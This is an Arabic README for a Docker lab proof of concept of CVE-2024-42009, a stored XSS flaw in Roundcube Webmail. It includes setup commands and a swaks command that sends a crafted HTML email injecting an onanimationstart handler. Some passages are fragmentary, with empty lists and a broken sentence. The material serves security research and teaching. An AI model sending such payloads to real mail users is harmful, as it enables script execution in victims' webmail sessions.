
# إثبات مفهوم قائم على Docker لـ CVE-2024-42009، ثغرة XSS مخزنة في Roundcube Webmail. يوضح الاستغلال عبر رسائل بريد إلكتروني HTML مصممة بعناية ويتضمن إعدادًا لبيئة مختبرية قابلة للاستغلال.
يُظهر هذا المستودع إثبات مفهوم (PoC) عمليًا لـ CVE-2024-42009، وهي ثغرة من نوع Cross-Site Scripting (XSS) المخزنة في بريد Roundcube الإلكتروني.
تحدث الثغرة بسبب تنقية HTML غير صحيحة تتبعها إعادة معالجة غير آمنة للسمات، مما يسمح للمهاجمين بحقن معالجات أحداث ضارة عبر رسائل HTML إلكترونية مُعدّة.
يقوم Roundcube بتنقية رسائل HTML الواردة ولكنه يعيد معالجة بعض السمات (مثل bgcolor، سمات مشوهة) لاحقًا، مما يؤدي إلى:
onanimationstart)يسمح هذا بتنفيذ كود JavaScript عشوائي عند فتح الضحية لرسالة إلكترونية ضارة.
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
docker compose up -d
⏳ انتظر حوالي 10-15 ثانية حتى يتم تهيئة خادم البريد.
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'
http://localhost:8080
بيانات الدخول:
أرسل البريد الإلكتروني الضار باستخدام أداة swaks:
swaks --to [email protected] \
--from [email protected] \
--server localhost:2525 \
--header "Content-Type: text/html; charset=utf-8" \
--header "Subject: CVE-2024-42009 PoC" \
--body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'


قم بالترقية إلى الإصدارات المصححة:
هذا المشروع مخصص للأغراض التعليمية وأبحاث الأمن المصرح بها فقط. لا تستخدمه ضد أنظمة دون إذن مناسب.